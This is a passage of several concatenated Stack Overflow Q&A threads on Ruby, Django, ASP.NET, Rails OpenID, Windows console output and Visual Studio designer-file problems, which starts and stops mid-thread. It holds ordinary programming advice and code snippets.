orig, Socket.do_not_reverse_lookup = Socket.do_not_reverse_lookup, true
UDPSocket.open do |s|
s.connect '64.233.187.99', 1
s.addr.last
end
ensure
Socket.do_not_reverse_lookup = orig
end
end
Then you should be able to run it by saying,
require 'getip'
GetIP.local_ip
A: require and include are two different things.
require is to strictly load a file once from a load path. The loadpath is a string and this is the key used to determine if the file has already been loaded.
include is used to "mix-in" modules into other classes. include is called on a module and the module methods are included as instance methods on the class.
module MixInMethods
def mixed_in_method
"I'm a part of #{self.class}"
end
end
class SampleClass
include MixInMethods
end
mixin_class = SampleClass.new
puts my_class.mixed_in_method # >> I'm a part of SampleClass
But many times the module you want to mix in is not in the same file as the target class. So you do a require 'module_file_name' and then inside the class you do an include module.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45253",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Django Calendar Widget? Does anyone know of any existing packages or libraries that can be used to build a calendar in a django app?
A: It seems that django-calendar has become django-agenda: http://github.com/dokterbob/django-agenda
A: Great Tipps
django-swingtime lives on
http://github.com/dakrauth/django-swingtime
A: The django-schedule code originally from thauber (thauber/django-schedule) has been forked and worked into the glamkit/glamkit-eventtools code for Galleries, Libraries, Museums and Archives. It has also been forked and updated by a variety of other folks, e.g. boskee/django-schedule, and my guess is that that might have fewer dependencies and be easier to integrate into another project. It says:
Django-schedule: A calendaring/scheduling application, featuring:
*
*one-time and recurring events
*calendar exceptions (occurrences changed or cancelled)
*occurrences accessible through Event API and Period API
*relations of events to generic objects
*ready to use, nice user interface
*view day, week, month, three months and year
*project sample which can be launched immediately and reused in your project
See the github "network" tab for a graphical navigation from the point of view of a given branch to see how other branches relate to it (i.e. what is available for merging).
A: A quick google search reveals django-gencal, which looks like exactly what you need. It would also be worth looking at the snippets under the calendar tag on Django Snippets at http://www.djangosnippets.org/tags/calendar/.
A: svn checkout http://django-calendar.googlecode.com/svn/trunk/ django-calendar-read-only
svn: URL 'http://django-calendar.googlecode.com/svn/trunk' doesn't exist
so google search may reveal, but it's no longer exists.
A: There is another calendar alternative here, Django Event Calendar from 3captus, that offers something a bit simpler. I'm trying it out now, but it looks like a better fit for me.
From the features list:
*
*Full feature calendar display using python calendar class
*Support month scrolling (forward or backward)
*AJAX add, modify, delete GUI
*Require mimimum knowledge of Django, should be a good compliment after you are done with django tutorial
(http://www.djangoproject.com/documentation/tutorial01/)
*Calendar and Event class can be used in any python project
*Full unit test included
A: There are also some calendar functions built into Python itself, you can see a simple implementation here.
A: Today I ran into django-swingtime. Worth checking out.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45264",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "34"
} |
Q: How do I make AutoCompleteExtender render above select controls in IE6 When an AutoCompleteExtender is displayed in IE6 it seems to ignore z-index and renders below any select controls (like dropdownlists) in IE6.
<asp:TextBox ID="TextBox1" runat="server" />
<cc1:AutoCompleteExtender ID="AutoCompleteExtender1" runat="server"
TargetControlID="TextBox1" EnableCaching="true" CompletionSetCount="5"
FirstRowSelected="true" ServicePath="~/Services/Service1.asmx" ServiceMethod="GetSuggestion" />
<asp:DropDownList ID="DropDownList1" runat="server">
<asp:ListItem Text="Item 1" Value="0" />
<asp:ListItem Text="Item 2" Value="1" />
</asp:DropDownList>
How do I make it render above dropdownlists?
A: Nothing renders below select controls in IE6. It's one of the many "features" microsoft bestowed upon us when they gifted IE to the world
You have to hide them, then re-show them.
Observe the standard lightbox script - which does exactly this
(note that link is just to the first thing I found on google which had the source to lightbox.js as a demonstration. It's got nothing to do with anything else)
A: @Orion has this partially correct - there is one other way to deal with these, and that is to cover the offending select lists with an iframe. This technique is used in Cody Lindley's ThickBox (written for jQuery). See the code for details on how to do it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45267",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I implement an OpenID server in Rails? I see a similar question for Ubuntu, but I'm interested in hosting my own OpenID provider through my Rails-based site that already has an identity and authentication system in place.
Note that I'm not looking for the delegate method to use the site as an OpenID.
What's the best way to do this properly?
A: This "No Shit Guide To Supporting OpenID In Your Applications"
seems to be a step-by-step tutorial for what you want to do.
A: Railscasts episode 68 OpenID authentication describes how to do exactly this. It's about a year old, so you may have to do some stuff differently. I'd also strongly for either an updated or newer OpenID plugin (the link for the one in the video is labeled "outdated").
Err, wait, that is to support OpenID authentication in a Rails application you are writing, not to have run an OpenID endpoint in rails.. Here is a guide to implimenting an OpenID server/endpoint in Rails pretty-much form scratch.. gem install openid-server might be easier, but you'll learn more implementing it yourself, and the code is pretty simple.
A: This reminds me that the overview docs for ruby-openid server are still missing. But you can see the example, and until the docs are ported over, see the docs for the python implementation which follows the same object model.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45277",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: How can I overwrite the same portion of the console in a Windows native C++ console app, without using a 3rd Party library? I have a console app that needs to display the state of items, but rather than having text scroll by like mad I'd rather see the current status keep showing up on the same lines. For the sake of example:
Running... nn% complete
Buffer size: bbbb bytes
should be the output, where 'nn' is the current percentage complete, and 'bbbb' is a buffer size, updated periodically on the same lines of the console.
The first approach I took simply printed the correct number of backspaces to the console before printing the new state, but this has an obnoxious flicker that I want to get rid of. I also want to stick to either standard library or MS-provided functionality (VC 8) so as not to introduce another dependency for this one simple need.
A: You can use SetConsoleCursorPosition. You'll need to call GetStdHandle to get a handle to the output buffer.
A: Joseph, JP, and CodingTheWheel all provided valuable help.
For my simple case, the most straight-forward approach seemed to be based on CodingTheWheel's answer:
// before entering update loop
HANDLE h = GetStdHandle(STD_OUTPUT_HANDLE);
CONSOLE_SCREEN_BUFFER_INFO bufferInfo;
GetConsoleScreenBufferInfo(h, &bufferInfo);
// update loop
while (updating)
{
// reset the cursor position to where it was each time
SetConsoleCursorPosition(h, bufferInfo.dwCursorPosition);
//...
// insert combinations of sprintf, printf, etc. here
//...
}
For more complicated problems, the full console API as provided by JP's answer, in coordination with the examples provided via the link from Joseph's answer may prove useful, but I found the work necessary to use CHAR_INFO too tedious for such a simple app.
A: If you print using \r and don't use a function that will generate a newline or add \n to the end, the cursor will go back to the beginning of the line and just print over the next thing you put up. Generating the complete string before printing might reduce flicker as well.
UPDATE: The question has been changed to 2 lines of output instead of 1 which makes my answer no longer complete. A more complicated approach is likely necessary. JP has the right idea with the Console API. I believe the following site details many of the things you will need to accomplish your goal. The site also mentions that the key to reducing flicker is to render everything offscreen before displaying it. This is true whenever you are displaying anything on the screen whether it is text or graphics (2D or 3D).
http://www.benryves.com/tutorials/?t=winconsole
A: In case the Joseph's suggestion does not give you enough flexibility, have a look at the Console API: http://msdn.microsoft.com/en-us/library/ms682073(VS.85).aspx.
A: In Linux, you can accomplish this by printing \b and/or \r to stderr. You might need to experiment to find the right combination of things in Windows.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45286",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: ASP.NET and sending SMS/making phone calls I have a scenario where I need to make a call to a telephone(landline/mobile) or send SMS to a particular set of users only using ASP.NET and C#. The web application is not a mobile application.
How do I go about doing these? What typically would be the hardware requirements? I would be extremely grateful if you could provide me with pointers and reference websites.
A: Most carriers provide an email address that you can send text messages to — for example, with Verizon, you can send an email to [email protected] and it will show up as a text message to that number.
Wikipedia has a full list of the carrier-provided email addresses.
By sending text messages as "emails" you can take advantage of System.Net.Mail and the like.
A: Not sure if you're looking for hardware solutions to automate yourself, or external services. However, I've used BT's Web21C pretty extensively.
They have an excellent .Net API and a host of functionality. Their pricing is the best in the UK, but might fall down with US SMS, which is obviously cheaper - there are plenty of other SMS API providers though.
What BT do offer, which is rare, is an API interface for automating call dialling, conferencing and managing call flow.
A: What exactly do you mean by "make a call"? Do you just need to call someone to transfer them or make your own custom, interactive automated call?
If you just need to make a simple call to transfer someone, there are services like VoiceStar that can do this. If you need to make a custom automated call, I would suggest OCS 2007 Speech Server. Asterisk is a SIP PBX and may or may not work for you depending on exactly what you're trying to do.
As far as sending text messages, I don't have much experience so others answers would probably be better.
A: Take a look at Twilio. You can find the .NET/C# helper library on GitHub.
A: Via WebServiceX, you can send SMS messages anywhere in the world. For phone calls I'd use Asterisk.
A: If it's for a UK then Esendex provides a nice WebService although BT's Web21C does seem to be that little bit cheaper.
A: messagepub, provides a single interface API to send not just SMS and make phone calls, but also IM, Twitter, and email messages. It might help you solve your problem.
They have a C# helper library that you could use to easily integrate multichannel messaging into your application.
A: For Turkish developers: http://www.mutlusms.com/yazilimgelistiriciler.html
A: I had built one a while back using an SMS gateway server. This was done in .net 1.1,ASP.net & vb.net. If i remember correctly, i built up a simple webpage and posted my request to the sms gateway server via http post.
The webpage carried a simple textbox and a button to submit. Once that was done, posted the message. The packet included username & password for authentication & an sms message.
Hope this helps.
A: I do not know much about calls but a very good API is available for free in Pakistan for sending and receiving sms easily. I gave it a try and my application is working great!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45293",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: How to change the Title of the command prompt window How can I change the title of the command prompt window every time I execute a dos-based program by double clicking it, in c language. Should I use the Windows API?
A: Try SetConsoleTitle.
A: title allows to set this:
title Windows Title (quotes unneeded)
A: you can do
%comspec% /c start "testtest" %comspec%
at application launcher of Windows+R
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45301",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Visual studio 2005 closes slowly I experience that on several different machines, with plugins, without plugins, with VB.net or c# solutions of many different sizes, closing the solution in VS 2005 generally takes significantly more time than actually building the solution.
This has always been the case for me since I started using Visual Studio 2005, so I have learned to live with it, but I am curious:
What on earth is visual studio doing when you have actually told it to shut down? Is it significant? Is it configurable, can you turn it off?
A:
What on earth is visual studio doing
when you have actually told it to shut
down?
You can use Process Monitor from sysinternals. It maybe because of some plugins. Try resetting your Visual Studio settings (Tools->Import and Export Settings->Reset All Settings).
A: I've found that closing all the open documents before you close the solution helps speed it up. Or maybe it's just a perception thing, but it seems faster :)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45313",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do you force Visual Studio to regenerate the .designer files for aspx/ascx files? Sometimes when I'm editing page or control the .designer files stop being updated with the new controls I'm putting on the page. I'm not sure what's causing this to happen, but I'm wondering if there's any way of forcing Visual Studio to regenerate the .designer file. I'm using Visual Studio 2008
EDIT: Sorry I should have noted I've already tried:
*
*Closing & re-opening all the files & Visual Studio
*Making a change to a runat="server" control on the page
*Deleting & re-adding the page directive
A: I use the following method which works everytime:
*
*Select all of the code-in-front (html markup etc) in the editor of the aspx/ascx file.
*Cut.
*Save.
*Paste.
*Save.
Recompile.
A: I recently saw that I was having the same problem. Visual Studio 2010 was refusing to update the designer file.
As it turns out, VS doesn't modify the designer file for a page that uses CodeFile (run off of pages) instead of CodeBehind (DLL). This is true no matter how many times you close VS, reload the project, re-create the control(s), or modify a file. Nothing would prompt VS to regenerate the designer. It's as if it doesn't create the designer file for CodeFile pages but does require it to be there.
I changed it to CodeBehind and saved the page. The designer file updated immediately. Then I just changed it back and everything was still golden. This behavior seems to be new with VS 2010 / .NET 4.0 as VS 2008 by default didn't suffer from this.
It's this part:
<%@ Page Language="vb" AutoEventWireup="false" CodeFile="YourPage.aspx.vb" Inherits="YourPageClass" %>
Change CodeFile to CodeBehind, save, and then revert.
A: I often found that copy/pasting caused this behaviour for me. Most cases can be solved by editing the ID of a server control (just add a character, then delete it).
Also remember that control inside things like Repeaters aren't visible in the designer file.
And yes, there are cases where you need to do the delete-the-file magic listed above - but the name-change solution will work most of the time.
A: My experience is that if you want to do like in this article, like stated above.
Your markup file (aspx/ascx) has to include the CodeBehind="MyPage.aspx.cs" attribute or else it won´t work. I blogged about it here.
A: I've found a way to solve this problem without changing any code or running commands like "Convert to Web Application" - and it's simple too!
What I found was that restarting Visual Studio often solves the problem, but sometimes it doesn't. In those cases, if you close Visual Studio and then delete all content in the "obj" directory for the web project before you open it again, it has always worked for me.
(when started again you just add a space and remove it again and then hit save to have the designer file properly regenerated)
A: (The following comes from experience with VS2005.)
If you edit an ASPX page while debugging, then the codebehind doesn't get updated with the new classes. So, you have to stop debugging, trivially edit the ASPX page (like add a button or something), then click Design View, then delete the button. Then, your designer files should be updated.
If you are having a different issue with VS2008, then I can't help.
A: When you are in design view, right click on the screen and hit refresh.
A: Another thing which worked was -
*
*Manually delete & then Create a designer file in filesystem.
*Edit Project file.
*Add code to include designer
Eg: <Compile Include="<Path>\FileName.ascx.designer.cs">
<DependentUpon>FileName.ascx</DependentUpon>
</Compile>
*Reload Project
*Open as(c/p)x file in design/view mode & save it.
*Check designer file. Code will be there.
A: There is another possibility: You may have an error in your .aspx file that does not allow Visual Studio to regenerate the designer.
If you switch to Design View, it will show the control as unable to be rendered. Fixing the control (in my case it was an extra quote in the properties) and recompiling should regenerate the designer.
A: If you open the .aspx file and switch between design view and html view and
back it will prompt VS to check the controls and add any that are missing to
the designer file.
In VS2013-15 there is a Convert to Web Application command under the Project menu. Prior to VS2013 this option was available in the right-click context menu for as(c/p)x files. When this is done you should see that you now have a *.Designer.cs file available and your controls within the Design HTML will be available for your control.
PS: This should not be done in debug mode, as not everything is "recompiled" when debugging.
Some people have also reported success by (making a backup copy of your .designer.cs file and then) deleting the .designer.cs file. Re-create an empty file with the same name.
There are many comments to this answer that add tips on how best to re-create the designer.cs file.
A: If you are using VS2013 or later , make sure that the code referenced with attribute "CodeBehind" not "CodeFile", then do below steps
<%@ Control Language="C#" AutoEventWireup="true" CodeBehind="yourControl.ascx.cs" Inherits="yourControl.yourControl" %>
*
*create empty designer page (or clear it if it's already exists "yourControl.ascx.designer.cs")
*in the ascx (or aspx) copy all code , the delete it, then save. re-past it again , then save.
*the designer file should be populated now.
A: Most of the solutions here don't work if you're running Visual Studio 2013 and possibly 2012. Microsoft probably introduced some optimizations to make the IDE snappier, consequently they've reduced the number of cases that trigger the code generator. The following scenarios that used to work no longer do:
*
*Delete the aspx or ascx file -- No longer checks for this case
*Cut all the content and repaste into the aspx or ascx file -- No longer works, no change in the references
*Convert to Web Application -- Option no longer available
*Arbitrarily changing content on the aspx/ascx file -- No longer works (see 2).
The solution is surprisingly simple, but it's slightly cumbersome. In order to trigger the code generator, change something that would require the designer.aspx.cs to be generated. Changing content that doesn't affect code, such as a CSS style or adding text, won't trigger the code generator. You must change a referenced control. Here's how to do it:
In the ascx or aspx change the ID of the control
<asp:HyperLink ID="MyLink" runat="server" NavigateUrl="~/Default.aspx" Text="Home" />
to
<asp:HyperLink ID="theLINK" runat="server" NavigateUrl="~/Default.aspx" CssClass="tab" Text="Home" />
Go to the ascx.cs or aspx.cs and make sure you rename all references to "MyLink" to "theLINK" as well. Save and do build and the you should be good to go.
A: *
*Select-all in the designer file and delete everything in the file, leaving it blank and then save
*Select-all in the ASPX/ASCX file and cut everything and then re-paste it back
*The designer file should have regenerated the code
A: Here is wat i experienced ,
Select the website folder right click in the Solution Explorer, select Convert to Web application for all the aspx file a designer file will get generated.
Sameer
A: The solution the worked for me is:
I just copied the page and and pasted it in the same portion, then renamed the first page(what ever name) and renamed the copied page as the original page. Now the controls are accessible.
A: Just to add to the long list of answers here - I've just run into this issue in VS2010 (SP1) with an .aspx file. I tried adding and removing standard ASP controls (which has worked in the past) but in the end, I had to remove one of the runat=server lines from an existing control (and save) to force the designer file to regenerate.
A: I've encountered the same problem for years now, working in Visual Studio 2008. And I've tried every "solution" on StackOverflow and dozens of blogs, just like I'm sure all of you have. And sometimes they work, and sometimes they don't, just like I'm sure all of you have encountered. And apparently it's still an issue in VS2010 and VS2012.
So finally, a couple of months ago, I decided enough was enough, and over a few weeks I built a tool called "Redesigner" that generates .designer files. It's open-source under the BSD license, with the source code available on SourceForge — free to use, free to steal, free to do anything you please with. And it does what Visual Studio fails to do so often, which is generate .designer files quickly and reliably.
It's a stand-alone command-line tool that parses .aspx and .ascx files, performs all the necessary reflection magic, and spits out correct .designer files. It does all the parsing and reflection itself to avoid relying on existing code, which we all know too well is broken. It's written in C# against .NET 3.5, but it makes pains to avoid using even System.Web for anything other than type declarations, and it doesn't use or rely on Visual Studio at all.
Redesigner can generate new .designer files; and it offers a --verbose option so that when things go wrong, you get far better error messages than "Exception of type System.Exception was thrown." And there's a --verify option that can be used to tell you when your existing .designer files are broken — missing controls, bad property declarations, unreadable by Visual Studio, or otherwise just plain borked.
We've been using it at my workplace to get us out of jams for the better part of the last month now, and while Redesigner is still a beta, it's getting far enough along that it's worth sharing its existence with the public. I soon intend to create a Visual Studio plugin for it so you can simply right-click to verify or regenerate designer files the way you always wished you could. But in the interim, the command-line usage is pretty easy and will save you a lot of headaches.
Anyway, go download a copy of Redesigner now and stop pulling out your hair. You won't always need it, but when you do, you'll be glad you have it!
https://sourceforge.net/projects/redesigner/
A: TL;DR;
Edit the Inherits attribute of the ASPX page's @Page directive and hit Save. Your designer file should be regenerated.
Ensure that Inherits = <namespace>.<class_name> and CodeBehind = <class_name>.aspx.cs
I was trying to do this on a Sharepoint 2010 project, using VS 2010 and TFS, and none of the solutions above worked for me. Primarily, the option, "Convert to Web Application" is missing from the right-click menu of the .ASPX file when using TFS in VS 2010.
This answer helped finally. My class looked like this:
namespace MyProjects.Finance.Pages
{
public partial class FinanceSubmission : WebPartPage
{
protected void Page_Load(object sender, EventArgs e)
{
}
// more code
}
}
And my @Page directive was (line-breaks here for clarity):
<%@ Page Language="C#" AutoEventWireup="true"
CodeBehind="FinanceSubmission.aspx.cs"
Inherits="MyProjects.Finance.Pages.FinanceSubmission"
MasterPageFile="~masterurl/default.master" %>
I first changed the Inherits to MyProjects.Finance.Pages, hit Save, then changed it back to MyProjects.Finance.Pages.FinanceSubmission and hit Save again. And wallah! The designer page was regenerated!
Hope this helps someone using TFS!
A: Within the Visual Studio:
1) Remove your aspx.designer.cs file
2) Right click on your aspx file and select "Convert to Web Application"
This should add the aspx.designer.cs back and up to date.
If you get an error saying:
"Generation of designer file failed: The method or operation is not implemented."
Try close Visual Studio and then reopen your project and do step number two again
How to generate aspx.designer.cs in visual studio?
A: in solution explorer just right click and select convert to web application. It will generate all the designer files again.
A: *
*Step 1: Select all your aspx code, Cut [ CTRL+X ] that code and Save.
*Step 2: Again paste the same code in the same page and save again
Now your .desinger page will refresh with all controls in .aspx page.
A: the only way I know is to delete the designer file, and do a convert to web app. However when you do this, it usually pops up with the error, as to why it didn't auto-regen in the first place, its usually a control ref that isn't declared in the head of the page.
A: Well I found a solution that works, though I don't really like it. I had to delete the .designer.cs file then recreate an empty file with the same name. When I went back in and saved the aspx file again, the designer file was re-generated.
Dodgy!
A: Convert to Web Application did not work for me.
Deleting designer.cs and pasting a blank designer.cs did not work either.
But yes this worked:
*
*Select all(Default.aspx)
*Cut
*Save Default.aspx
*Paste
*Save Default.aspx
Done. New designer.cs generated. :)
A: Delete the designer.cs file and then right click on the .aspx file and choose "Convert To Web Application". If there is a problem with your control declarations, such as a tag not being well-formed, you will get an error message and you will need to correct the malformed tag before visual studio can successfully re-generate your designer file.
In my case, at this point, I discovered that the problem was that I had declared a button control that that was not inside of a form tag with a runat="server" attribute.
A: This is a bug in the IDE; I've seen it since VS 2003. THe solution is simple though.
Save your files. Completely exit the IDE (make sure the process stops, task mgr.)
Reopen the solution, dirty the markup, save. Fixed.
A: I had two problems... outdated AJAXControlkit - deleted the old dll, removed old controls from toolbox, downloaded new version, loaded toolbox, and dragged and dropped new controls on the page (see http://www.experts-exchange.com/Programming/Languages/.NET/Visual_Studio_.NET_2005/Q_24591597.html)
Also had misspelling in my label control (had used 'class' instead of 'cssclass').
Ta
A: If you are like me and you add old .ASPX files to a more recent project.
You are probably going to forget some of the controls used on the page.
If so, first thing, if there are multiple files you are installing;
Fix one at a time first.
When you compile, fix errors generated. They will probably be the same
errors in all the files.
Next, if you have Designer files, delete all of the inserted - designer files.
Next, make sure there are not any other errors when you compile, other than
the designer files.
Finally right click your web project and click on Convert to Web Application.
This will insert the designer files you need.
These are the absolute best steps to fix the issues.
A: I had the problem that my new controls would not generate in the designer file when declared in the .ascx file. The problem was that i declared them in the code behind also. So deleting the declaration in the code behind solved my problem.
A: One thing that nobody's mentioned is to visit the page. I had my designer file stop regenerating because I was including a user control that didn't exist (for various reasons), and none of the things suggested here worked. For whatever reason, I didn't get any errors in Visual Studio - besides the one complaining about the fact that my client-side controls didn't exist because they weren't being regenerated, of course.
It took actually visiting the page to get ASP.Net to tell me the error.
A: This can also happen if you update the namespace and don't update the namespace in the designer file. Fix: Update the namespace in the designer file too.
A: The solution was for me to change from None to Compile in .csproj file
<Compile Include="Logout.aspx.designer.cs">
<DependentUpon>Logout.aspx</DependentUpon>
</Compile>
A: *
*replace your custom tag with a invalid tag name. Save it
*restore the invalid tag name back to custom tag name. Save it. Then you will be prompted to checkout the *.designer.cs files(or silently modify the designer.cs) and produce correct variable of custom tag control.
A: I had this problem and for me, I had a space in one of my ID values for one of my controls. I took the space out and the designer file regenerated itself.
A: In my case I was just missing a register TagPrefix at the top. Somehow the previous dev worked without having this in there?
A: I have had this issue before. I usually just hit enter to add a line and then wait for the plus/minus to show on the html page and the designer should add what you need. I have also had to close the project and reopen it to get it to work.
A: I've had this problem a lot, and just did again. I tried fixing it using these suggestions, and nothing worked. I finally found that I had the 'Title' attribute in the page header twice(I added to the end, not realizing that VS added a blank Title="" to the beginning)-- removing the extra attribute caused VS2008 to re-generate the designer file... I hope VS2010 fixes this problem, letting us know why the designer file generation isn't happening...
--
Derek
A: Apart from all the good answers already given, I'd like to add to @johan-leino's great answer. In my case, for some arbitrary reason, the CodeBehind attribute was omitted from the @Page directive/.aspx file. Likewise, it might be worthwhile to check the CodeFile attribute for @Control directives/.ascx files (obviously in conjunction with an Inherits attribute in both cases).
Depending on the exact scenario and reason required to 'force' a regenerate of .designer.cs, one could also try to format the document (potentially indicating a parsing error) before (quick) saving (regardless whether there were any changes or not) and check the Error List for warnings.
A: In my case, it was fixed when I added a CodeBehind to the @Page section.
A: I know I'm late to the party, but I thought if after trying the accepted answer by @Glenn Slaven and the current highest rated answer by @Espo you are still out of luck, the following might save some people out there some trouble.
User Controls (.ascx) are what constantly stop auto-generating for me. I've found that in the instances where I use other User Control(s) in my User Control, it breaks the auto-generation.
The solution I came up with was to use the trick we all know of for getting IntelliSense to work in User Controls or Skin files when using CSS classes from external sources. Instead of just referencing the CSS file, now I Register the other User Control(s) that I need. It looks something like this:
<% If False Then %>
<%@ Register TagPrefix="uc" TagName="Title" Src="~/controls/title.ascx" %>
<link rel="stylesheet" type="text/css" href="../css/common.css" />
<% End If %>
After that, I Save the file, which prompts the auto-generation to regenerate, and I'm back up and running.
A: I know this is an old topic but I just wanted to add a solution that wasn't suggested yet.
I had the same problem with a resource file. I edited it outside Visual Studio and the designer file hadn't updated properly.
Renaming the file did the trick of regenerating the Designer file. I just renamed it to the initial name again and that worked just fine!
A: I'm in VS 2003 and none of these worked for me. What worked was to open the code at the top of the .vb page in the section labeled Web Form Designer Generated Code (the part that says not to edit there) and declare it there, where the system declared all the other controls. Bizzare.
A: For VS2015... here's a VB example for switching from a WebSite project to a Web Application Project that worked for me. None of the other solutions worked for me, which is why I'm sharing this. It's not elegant, but works.
Step 0: Replace all " CodeFile=" with " CodeBehind=" in your project
Step 1: Close the Solution.
Step 2: Run a home-grown Windows app with the following code (below steps).
Step 3: Re-open the solution.
Step 4: In Solution Explorer, make sure you are Showing All Files, and search for designer.vb (or designer.cs for C#)
Step 5: Select all the missing files, and include them in your project.
Step 6: For each file, view the main page / control and save it.
private void button1_Click(object sender, EventArgs e)
{
ProcessDirectory(new DirectoryInfo(textBox1.Text));
}
private void ProcessDirectory(DirectoryInfo directory)
{
ProcessMask(directory, ".ascx", ".vb");
ProcessMask(directory, ".aspx", ".vb");
foreach (DirectoryInfo directoryInfo in directory.GetDirectories())
ProcessDirectory(directoryInfo);
}
private void ProcessMask(DirectoryInfo directory, string maskStart, string maskEnd)
{
FileStream fs;
foreach (FileInfo file in directory.GetFiles(string.Format("*{0}{1}", maskStart, maskEnd)))
{
string designerFileName = file.Name.Replace(string.Format("{0}{1}", maskStart, maskEnd), string.Format("{0}.designer{1}", maskStart, maskEnd));
if (directory.GetFiles(designerFileName).Length == 0)
{
using (fs = File.Create(Path.Combine(directory.FullName, designerFileName)))
{
fs.Close();
}
}
}
}
A: I thought I had this problem and was tearing my hair out, but then I realised that I was trying to reference a control from a static method.
Making the method non-static resolved the issue for me.
A: *
*Close designer.cs.
*Change your aspx file to design view.
*Right-Click –> Refresh.
*Save
A: One of my solution, which works for me.
*
*Close the Visual Studio
*Remove hidden .vs directory
*Remove existing .sln file
*load the project in visual studio using .csproj file
A: In Visual Studio 2019 below are the steps:
*
*Create webform1.aspx
*Copy your aspx code and paste in webform1.aspx
*Compile your project you should have designer code inside webform1.aspx.designer.cs
*Now you can copy designer code and use in your original webform.
A: If you see this while using Visual Basic 2019 and you clicked on the "permanently delete this file" confirmation, you can recover the designer.cs files from your recycle bin...it will regenerate in Visual Basic automatically. I just did it and found my file just as it was.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45325",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "423"
} |
Q: MS Visual Studio "Package Load Failure" error I'm receiving "Package Load Failure" error when I open VS 2005 after I installed the latest VisualSVN (v. 1.5.2). Anyone facing this error? Is there any tool out there to help identify which package didn't load and/or help unload a specific package?
A: Installing the Visual Studio SDK will install the "Package Load Analyzer" package. This allows you to see what package failed to load and why.
A: There should be VisualSVN log files in your temp folder (somewhat like
"C:\Documents and Settings\\Local
Settings\Temp\VisualSVN-2007-06-02-00-01-416.log").
Do you see anything in that file that helps?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45331",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: Why is my web control null? I have a web site in asp.net that uses a master page. In this master page I have a multiview control with one view that has all the content for the content pages and one view that has some local content to the master page where I show error messages from all content pages.
In this error view I have a asp.net Label control that displays the error messages. Usually the label works fine, but in some few cases the label is null, which renders a NullReferenceException. Now I have handled this case by checking if the label is null before using it, but still my question is:
Why is this label null? What are the circumstances that can generate this?
EDIT: In the master page I have a method called SetErrorText that takes a string and sets the label. I'm calling this method from the content pages' Page_Load method, and this generally works fine. In all but two cases (that I've discovered so far) the label is initialised, and nothing separates these two cases from all the ones that work.
Also, all other controls in the master page are initialised, such as the View-control that houses the label.
When the Page_Load of a content page rolls around, the master page should be populated.
A: It seems that the problem was one of sloppiness. Someone had forgotten to delete the auto-generated Content-controls that Visual Studio throws in on all content pages where the master page has a ContentPlaceHolder-control.
If a content page has a Content-control, all controls that are placed in the ContentPlaceHolder-control on the master page will be null, it seems.
A: What method on the master page are you accessing the label from? Depending on the stage of the page lifecycle, the label control may not have been loaded yet
A: Could you be accessing it before it is created? Check the page lifecycle: http://msdn.microsoft.com/en-us/library/ms178472.aspx
A: I had a very similar error. In my case it was caused by .NET compiler wierdness related to the control designer file. Even if the designer file has the controls defined correctly, delete it, re-generate it and rebuild (make sure to rebuild, don't just 'build'). See the top answer here for how to do regenerate the designer file:
How do you force Visual Studio to regenerate the .designer files for aspx/ascx files?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45339",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Friendly URLs for ASP.NET Python frameworks always provide ways to handle URLs that convey the data of the request in an elegant way, like for example http://somewhere.overtherainbow.com/userid/123424/
I want you to notice the ending path /userid/123424/
How do you do this in ASP.NET?
A: This is an alternative example that also uses ASP.NET Routing to implement friendly URLs.
Examples of the mappings that the application handles are:
http://samplesite/userid/1234 - http://samplesite/users.aspx?userid=1234
http://samplesite/userid/1235 - http://samplesite/users.aspx?userid=1235
This example does not use querystrings but requires additional code on the aspx page.
Step 1 - add the necessary entries to web.config
<system.web>
<compilation debug="true">
<assemblies>
…
<add assembly="System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</assemblies>
</compilation>
…
<httpModules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" />
</httpModules>
</system.web>
<system.webServer>
…
<modules>
…
<add name="UrlRoutingModule" type="System.Web.Routing.UrlRoutingModule, System.Web.Routing, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
</modules>
<handlers
…
<add name="UrlRoutingHandler" preCondition="integratedMode" verb="*" path="UrlRouting.axd" type="System.Web.HttpForbiddenHandler, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
</handlers>
</system.webServer>
Step 2 - add a routing table in global.asax
Define the mapping from the friendly URL to the aspx page, saving the requested userid for later use.
void Application_Start(object sender, EventArgs e)
{
RegisterRoutes(RouteTable.Routes);
}
public static void RegisterRoutes(RouteCollection routes)
{
routes.Add("UseridRoute", new Route
(
"userid/{userid}",
new CustomRouteHandler("~/users.aspx")
));
}
Step 3 - implement the route handler
Pass the routing context, containing the parameter, to the page. (Note the definition of IRoutablePage)
using System.Web.Compilation;
using System.Web.UI;
using System.Web;
using System.Web.Routing;
public interface IRoutablePage
{
RequestContext RequestContext { set; }
}
public class CustomRouteHandler : IRouteHandler
{
public CustomRouteHandler(string virtualPath)
{
